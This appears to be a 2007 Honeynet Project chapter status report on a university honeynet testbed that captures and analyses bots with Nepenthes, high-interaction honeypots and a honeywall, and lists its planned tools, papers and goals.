1. DEPLOYEMENTS

=============================================================

1.1 Current technologies deployed.

GenIII Honeynet Testbed

Current Components of Testbed are:

• 1 Nepenthes Low-interaction honeypot
• 2 High-interaction honeypots (Windows XP)
• Roo Based Honeywall
• Modified Truman Sandnet
• Bot Repository
 
Future Additonal Components are:

• Attack Correlator
• Nepenthes enhancements
• IRC Sandman 

Low-Interaction Honeypots:

Production Nepenthes: Nepenthes system setup to capture malware and feed it into our Gen 3 Honeynet architecture for both on-line and off-line analysis

Development Nepenthes: Nepenthes sensor used for testing advancements made to the Nepenthes low-interaction honeypot

High-Interaction Honeypots:

Window XP Professional Honeypots used as entry point for bots that have been captured using Nepenthes to inter into our honeynet testbed.  Bots are allowed to connect to the internet after the install so we can observe the interactions between them and their command and control.

Roo Based Honeywall:

Captures all our out-going and incoming traffic on our testbed.

Distributed Honeypots/Honeynets:

Member of GDH

Bot Repository:

Each bot captured in Nepenthes is downloaded, using a perl script, to the bot repository.  the repository keeps track of each bot according to its md5 value.

 

BotZoo Bot Repository

 

1.2 Activity timeline: Highlight attacks, compromises, and interesting information collected.

• Interesting information:

We have noticed that using statistically based malware detection and anti-virus methods is not very effective.  This is evident by the amount of binaries that we captured using Nepenthes that went undetected when we ran them through our two anti-virus programs.  To address this issue, we are currently developing components that will be able to detect and classify malware based on their behaviors and not just static signatures. (More on this in the next report)

Anti-Virus Detections (About 25% not detected using both Anti-virus Programs)

 

2. FINDINGS

=============================================================

2.1 Data analysis tools and methods being used.

The tools we used for data analysis are:  Nepenthes, Wireshark, Walleye, Perileyez, Sebek, Norton Antivirus, ClamAV, and Truman Sandnet.

Once we collect the malware and start running it on our architecture as mentioned earlier (section 1), we go through a series of steps for our analysis:

• Identification:  Nepenthes
• Source of Infection:  Nepenthes
• System Interaction:  Perileyez, Honeywall , Sebek
• DNS queries:  Wireshark, Truman Sandnet
• IRC Communications:  Truman Sandnet, Wireshark

The identification and source of infection is determined by Nepenthes, since all malware is stored by its md5 value.  The initial system interaction is analyzed by perileyez, showing the snapshots of the system directly after the malware is installed on our architecture.  The honeywall is also a major analyzer of system interaction, using its web management application, Walleye.  We use Sebek to record all commands that are issued on our infected honeypot.  We also keep track of all DNS queries and IRC Communications that are captured in our architecture using Wireshark to manually view the packets and Truman Sandnet which sometimes list hardcoded DNS addresses in its strings.

2.2 For data analysis what tools work well, and what still needs to be developed.

The tools we use work well for now, but need to be replaced with tools made to tailor to our system.  We would like to capture more interesting malware and observe more creative attack patterns.  Currently most of our malware that has been run on our system has shown similar patterns and characteristics with each other.  To improve upon this we plan on adding more applications to our system and creating more vulnerability modules for Nepenthes as to capture different types of malware destined for new types of vulnerabilities.

3. LESSION LEARNED

=============================================================

3.1 Positive things share with the community.

• The more practice you have at analyzing data, the easier it will be to point out things that look like an attack.  Using our honeynet architecture has allowed many of our students to become proficient in analyzing malicious packets.

3.2 Mistakes share with the community.

None, currently.

3.3 Research ideas.

• Creation of a risk-aware architecture that uses the determined risk of that network as a factor in detecting and blocking malware.  (This is in its preliminary stages)

 

 

 

4. NEW TOOLS

=============================================================

4.1 New tools or technology we are working on. (Currently not released)

Extension Module for Nepenthes (Name not yet decided on)

Uses script space to add vulnerability modules on the fly.  No need to reboot Nepenthes when you want to add a new vulnerability for an attacker to compromise!

IRC Sandman

Examines IRC communications, extracts commands, and downloads secondary injections found in the communications.

4.2 Integrate with any other tools and Collaboration.

Extension Module should work with any malware collection tool (further testing needed), but it was designed to work with Nepenthes.  So far there has been no discussions with the authors of Nepenthes for integration.

5. PAPERS AND PRESENTATIONS

=============================================================

5.1 Presentations

• N. Paxton, S. Blanchard, R. J. Zhuge, Introduction to Honeypot/Honeynet and their applications, invited technical trainings at South China Advanced Information Security Training Class, Oct, 2006 and at CNCERT/CC, Nov, 2006.

5.2 Papers

• J. Grizzard, V. Sharma, C. Nunnery, B. Kang, and D. Dagon, Peer-to-Peer Botnets: Overview and Case Study, Proceedings of the 1^st Workshop on Hot Topics in understanding Botnets, Cambridge, MA April, 10, 2007

 

• N. Paxton, G. Ahn, R. Kelly, K. Pearson, Collecting and Analyzing Bots in a Systematic Honeynet-based Testbed Environment, Proceedings of the 11^th Colloquium for Information Systems Security Education, Boston University, Boston, MA June 4-7, 2007

5.3 Are you looking for any data or people to help with your papers

• Yes, we are always open to doing collaborative work

6. ORGANIZATIONAL

=============================================================

6.1 Changes in the structure of your organization.

Our structure changes constantly, in particular our personnel due to graduation.  All those actively involved agreee to keep data collected confidential.

6.2 Your feedback on Alliance activities.

• Napoleon Paxton attended the 2006 Annual Get Together for the first time.

• We have deployed a GDH node and will be participating in analysis more actively during the coming months.

6.3 Any suggestions for improving the Alliance?

None currently.

7. GOALS

=============================================================

7.1 Which of your goals did you meet for the last period?

• 1. We have become more actively involved within the honeynet alliance by deploying a GDH node

• 2. We have received funding from unnamed Gov and Finanacial institutions.

• 3. We have published two papers (listed above under publications).

• 5. We have reconstructed our website.

7.2 Which of your goals did you not meet for the last period?

• 1. This is our first reporting period, but we have been progressing very rapidly.

7.3 Goals for the next six months

• 1. Complete extension module for Nepenthes and IRC Sandman tools and publish them under a GPL license

• 2. Obtain more funding so we can broaden our capabilities

• 3. Publish more papers on results gained using our honeynet testbed

 

8. MISC ACTIVITIES

=============================================================

• We plan on sending two members to the honeynet alliance meeting in the Fall to share ideas and broaden our collective pursuit in defending the internet against cyber attackers.